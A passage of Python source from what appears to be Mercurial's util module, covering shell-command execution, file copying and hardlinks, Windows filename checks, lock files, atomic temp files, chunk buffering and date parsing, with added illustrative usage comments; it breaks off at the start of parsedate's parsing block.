    This garbage collector issue has been fixed in 2.7.
    """
    if sys.version_info >= (2, 7):
        return func
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

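# Illustrative usage sketch for nogc (not part of the original module):
# on Python < 2.7 the wrapper disables the collector for the duration
# of the call and restores its previous state afterwards.
#
#   @nogc
#   def buildhugedict(items):
#       return dict(items)   # hypothetical container-heavy builder
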
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

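# Illustrative example for pathto (not part of the original module;
# assumes a POSIX os.sep of '/'): the common prefix is stripped and
# one '..' is emitted per remaining component of n1.
#
#   pathto('/repo', 'a/b', 'a/c/d')   # -> '../c/d'
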
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze

# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

_hgexecutable = None

def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable

def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    global _hgexecutable
    _hgexecutable = path

def _isstdout(f):
    fileno = getattr(f, 'fileno', None)
    return fileno and fileno() == sys.__stdout__.fileno()

def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        if val is None or val is False:
            return '0'
        if val is True:
            return '1'
        return str(val)
    env = dict(encoding.environ)
    if environ:
        env.update((k, py2shell(v)) for k, v in environ.iteritems())
    env['HG'] = hgexecutable()
    return env

def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    if pycompat.sysplatform == 'plan9' and (sys.version_info[0] == 2
                                            and sys.version_info[1] < 7):
        # subprocess kludge to work around issues in half-baked Python
        # ports, notably bichued/python:
        if cwd is not None:
            os.chdir(cwd)
        rc = os.system(cmd)
    else:
        env = shellenviron(environ)
        if out is None or _isstdout(out):
            rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                                 env=env, cwd=cwd)
        else:
            proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                    env=env, cwd=cwd, stdout=subprocess.PIPE,
                                    stderr=subprocess.STDOUT)
            for line in iter(proc.stdout.readline, ''):
                out.write(line)
            proc.wait()
            rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        rc = 0
    return rc

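# Illustrative usage sketch for system() (not part of the original
# module; the command, override, and directory are example values).
# The return value is the child's exit code:
#
#   rc = system('ls -l', environ={'HGPLAIN': True}, cwd='/tmp')
#   # py2shell turns True into '1', so the child sees HGPLAIN=1
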
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise

    return check

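# Illustrative sketch of what checksignature distinguishes (not part
# of the original module): a TypeError raised at the call boundary
# (traceback depth 1) becomes SignatureError, while a TypeError from
# inside the function body propagates unchanged.
#
#   f = checksignature(lambda x: x)
#   f(1, 2)   # wrong arity -> error.SignatureError
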
# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = set([
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
])

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't
        # needed for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
                if oldstat and oldstat.stat:
                    newstat = filestat(dest)
                    if newstat.isambig(oldstat):
                        # stat of copied file is ambiguous to original one
                        advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                        os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))

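# Illustrative usage sketch for copyfile (not part of the original
# module; paths are example values). With hardlink=True the link is
# only attempted when dest sits on a whitelisted filesystem, and a
# failed oslink() silently falls back to a real copy:
#
#   copyfile('/repo/.hg/store/data/a.i', '/backup/a.i', hardlink=True)
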
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    gettopic = lambda: hardlink and _('linking') or _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in osutil.listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
    progress(topic, None)

    return hardlink, num

_winreservednames = '''con prn aux nul
    com1 com2 com3 com4 com5 com6 com7 com8 com9
    lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9'''.split()
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename("just/a/normal/path")
    >>> checkwinfilename("foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename("foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/xml.con")
    >>> checkwinfilename("foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename("foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename("../bar")
    >>> checkwinfilename("foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename("foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains %r, which is invalid "
                         "on Windows") % c
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.osname == 'nt':
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return os.readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    r = fp.read()
    fp.close()
    return r

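# Illustrative usage sketch for the lock-file pair (not part of the
# original module; the path and payload are example values): the lock
# payload is stored in a symlink target where symlinks exist, and in a
# regular file otherwise; readlock handles both representations.
#
#   makelock('pid:1234', '/repo/.hg/wlock')
#   readlock('/repo/.hg/wlock')   # -> 'pid:1234'
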
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
        if b == b2:
            return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

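# Illustrative usage sketch for the re2 fallback (not part of the
# original module; the pattern is an example value): callers use the
# module-level 're' object, and the backend choice (re2 vs the stdlib
# re module) stays invisible to them.
#
#   pat = re.compile(r'bugs?\d+', remod.IGNORECASE)
#   pat.match('BUG42')   # matches with either backend
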
_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)

def getfstype(dirpath):
    '''Get the filesystem type name from a directory (best-effort)

    Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
    '''
    return getattr(osutil, 'getfstype', lambda x: None)(dirpath)

def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1 = testfile + ".hgtmp1"
    if os.path.lexists(f1):
        return False
    try:
        posixfile(f1, 'w').close()
    except IOError:
        try:
            os.unlink(f1)
        except OSError:
            pass
        return False

    f2 = testfile + ".hgtmp2"
    fd = None
    try:
        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fd = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fd is not None:
            fd.close()
        for f in (f1, f2):
            try:
                os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because it is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def gui():
    '''Are we running in a GUI?'''
    if pycompat.sysplatform == 'darwin':
        if 'SSH_CONNECTION' in encoding.environ:
            # handle SSH access to a box where the user is logged in
            return False
        elif getattr(osutil, 'isgui', None):
            # check if a CoreGraphics session is available
            return osutil.isgui()
        else:
            # pure build; use a safe default
            return True
    else:
        return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")

def mktempcopy(name, emptyok=False, createmode=None):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode)
    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """help to exactly detect change of a file

    The 'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists. Otherwise, it is None. This avoids a preparatory
    'exists()' examination on the client side of this class.
    """
    def __init__(self, path):
        try:
            self.stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            self.stat = None

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat.st_ctime == old.stat.st_ctime and
                    self.stat.st_mtime == old.stat.st_mtime)
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more
        within the same second (= S[n-1].ctime), and comparison of
        timestamps is ambiguous.

        The basic idea to avoid such ambiguity is "advance mtime 1 sec,
        if timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        a change masked by colliding mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of the file isn't changed.
        """
        try:
            return (self.stat.st_ctime == old.stat.st_ctime)
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'.
        """
        advanced = (old.stat.st_mtime + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return
            raise

    def __ne__(self, other):
        return not self == other

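# Illustrative worked example for the ambiguity logic above (not part
# of the original module; timestamps are invented). Two writes landing
# within the same ctime second look identical to (size, ctime, mtime),
# so the newer stat is "ambiguous" and avoidambig() advances its mtime
# one second past the old one:
#
#   old = filestat('foo')        # say st_ctime == st_mtime == 1500000000
#   # ... file rewritten within the same second ...
#   new = filestat('foo')        # st_ctime is still 1500000000
#   new.isambig(old)             # -> True
#   new.avoidambig('foo', old)   # mtime becomes 1500000001
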
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

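# Illustrative usage sketch for atomictempfile (not part of the
# original module; the path is an example value). Readers never see a
# partially written file: the rename happens only on a clean close.
#
#   with atomictempfile('/repo/.hg/branch') as f:
#       f.write('default\n')
#   # on an exception inside the block, discard() drops the temp file
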
def unlinkpath(f, ignoremissing=False):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)

def readfile(path):
    with open(path, 'rb') as fp:
        return fp.read()

def writefile(path, text):
    with open(path, 'wb') as fp:
        fp.write(text)

def appendfile(path, text):
    with open(path, 'ab') as fp:
        fp.write(text)

class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If the size parameter is omitted, read everything."""
        if l is None:
            return ''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return ''.join(buf)

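# Illustrative usage sketch (an editor's addition, not upstream code):
# chunkbuffer turns an iterator of arbitrarily sized byte chunks into a
# reader that honors exact byte counts, regardless of chunk boundaries:
#
#     buf = chunkbuffer(iter(['abc', 'defgh']))
#     buf.read(4)    # -> 'abcd' (spans the two input chunks)
#     buf.read(4)    # -> 'efgh' (rest of the second chunk)
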
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, ``size``
    (default 131072) bytes at a time, up to an optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s

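# Illustrative usage sketch (an editor's addition, not upstream code):
# streaming a file in bounded chunks, e.g. to hash it without loading the
# whole file into memory. 'somepath' is a hypothetical filename; hashlib
# is assumed to be importable as in the rest of this module.
#
#     h = hashlib.sha1()
#     with open(somepath, 'rb') as fp:
#         for chunk in filechunkiter(fp, size=65536):
#             h.update(chunk)
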
def makedate(timestamp=None):
    '''Return a unix timestamp (or the current time) as a (unixtime,
    offset) tuple based off the local timezone.'''
    if timestamp is None:
        timestamp = time.time()
    if timestamp < 0:
        hint = _("check your clock")
        raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
    delta = (datetime.datetime.utcfromtimestamp(timestamp) -
             datetime.datetime.fromtimestamp(timestamp))
    tz = delta.days * 86400 + delta.seconds
    return timestamp, tz

def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
    """represent a (unixtime, offset) tuple as a localized time.
    unixtime is seconds since the epoch, and offset is the time zone's
    number of seconds away from UTC.

    >>> datestr((0, 0))
    'Thu Jan 01 00:00:00 1970 +0000'
    >>> datestr((42, 0))
    'Thu Jan 01 00:00:42 1970 +0000'
    >>> datestr((-42, 0))
    'Wed Dec 31 23:59:18 1969 +0000'
    >>> datestr((0x7fffffff, 0))
    'Tue Jan 19 03:14:07 2038 +0000'
    >>> datestr((-0x80000000, 0))
    'Fri Dec 13 20:45:52 1901 +0000'
    """
    t, tz = date or makedate()
    if "%1" in format or "%2" in format or "%z" in format:
        sign = (tz > 0) and "-" or "+"
        minutes = abs(tz) // 60
        q, r = divmod(minutes, 60)
        format = format.replace("%z", "%1%2")
        format = format.replace("%1", "%c%02d" % (sign, q))
        format = format.replace("%2", "%02d" % r)
    d = t - tz
    if d > 0x7fffffff:
        d = 0x7fffffff
    elif d < -0x80000000:
        d = -0x80000000
    # Never use time.gmtime() and datetime.datetime.fromtimestamp()
    # because they use the gmtime() system call which is buggy on Windows
    # for negative values.
    t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
    s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
    return s

def shortdate(date=None):
    """turn (timestamp, tzoff) tuple into ISO 8601 date."""
    return datestr(date, format='%Y-%m-%d')

def parsetimezone(s):
    """find a trailing timezone, if any, in string, and return a
    (offset, remainder) pair"""

    if s.endswith("GMT") or s.endswith("UTC"):
        return 0, s[:-3].rstrip()

    # Unix-style timezones [+-]hhmm
    if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
        sign = (s[-5] == "+") and 1 or -1
        hours = int(s[-4:-2])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()

    # ISO8601 trailing Z
    if s.endswith("Z") and s[-2:-1].isdigit():
        return 0, s[:-1]

    # ISO8601-style [+-]hh:mm
    if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
        s[-5:-3].isdigit() and s[-2:].isdigit()):
        sign = (s[-6] == "+") and 1 or -1
        hours = int(s[-5:-3])
        minutes = int(s[-2:])
        return -sign * (hours * 60 + minutes) * 60, s[:-6]

    return None, s

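# Illustrative usage sketch (an editor's addition, not upstream code):
# parsetimezone only splits off a trailing timezone; the caller parses the
# remainder. Note the sign convention matches the NOTE in strdate below
# (unixtime = localunixtime + offset), so zones east of UTC are negative:
#
#     parsetimezone('2017-08-01 12:00:00 +0200')
#     # -> (-7200, '2017-08-01 12:00:00')
#     parsetimezone('Tue Jan 19 03:14:07 2038')
#     # -> (None, 'Tue Jan 19 03:14:07 2038')   (no timezone found)
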
def strdate(string, format, defaults=None):
    """parse a localized time string and return a (unixtime, offset) tuple.
    if the string cannot be parsed, ValueError is raised."""
    if defaults is None:
        defaults = {}

    # NOTE: unixtime = localunixtime + offset
    offset, date = parsetimezone(string)

    # add missing elements from defaults
    usenow = False # default to using biased defaults
    for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
        found = [True for p in part if ("%"+p) in format]
        if not found:
            date += "@" + defaults[part][usenow]
            format += "@%" + part[0]
        else:
            # We've found a specific time element, less specific time
            # elements are relative to today
            usenow = True

    timetuple = time.strptime(date, format)
    localunixtime = int(calendar.timegm(timetuple))
    if offset is None:
        # local timezone
        unixtime = int(time.mktime(timetuple))
        offset = unixtime - localunixtime
    else:
        unixtime = localunixtime + offset
    return unixtime, offset

def parsedate(date, formats=None, bias=None):
    """parse a localized date/time and return a (unixtime, offset) tuple.

    The date may be a "unixtime offset" string or in one of the specified
    formats. If the date already is a (unixtime, offset) tuple, it is returned.

    >>> parsedate(' today ') == parsedate(\
                                  datetime.date.today().strftime('%b %d'))
    True
    >>> parsedate('yesterday ') == parsedate((datetime.date.today() -\
                                              datetime.timedelta(days=1)\
                                             ).strftime('%b %d'))
    True
    >>> now, tz = makedate()
    >>> strnow, strtz = parsedate('now')
    >>> (strnow - now) < 1
    True
    >>> tz == strtz
    True
    """
    if bias is None:
        bias = {}
    if not date:
        return 0, 0
    if isinstance(date, tuple) and len(date) == 2:
        return date
    if not formats:
        formats = defaultdateformats
    date = date.strip()

    if date == 'now' or date == _('now'):
        return makedate()
    if date == 'today' or date == _('today'):
        date = datetime.date.today().strftime('%b %d')
    elif date == 'yesterday' or date == _('yesterday'):
        date = (datetime.date.today() -
                datetime.timedelta(days=1)).strftime('%b %d')

    try:
